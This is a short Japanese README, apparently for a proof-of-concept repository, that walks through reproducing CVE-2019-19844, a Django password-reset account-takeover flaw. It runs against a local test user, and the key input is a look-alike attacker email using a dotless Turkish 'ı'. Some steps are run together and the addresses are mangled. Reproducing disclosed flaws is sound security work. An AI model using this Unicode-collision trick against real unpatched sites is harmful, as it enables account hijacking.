
CVE-2019-19844のPoC(https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
CVE-2019-19844 の PoC
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME にデータベース名を設定(例: export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinputshell コマンドで以下のユーザーを作成:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserver を実行http://127.0.0.1:8000/accounts/password-reset/ を開くmı[email protected](攻撃者のメールアドレス)を入力し、送信ボタンをクリックmike123 ユーザーとしてログイン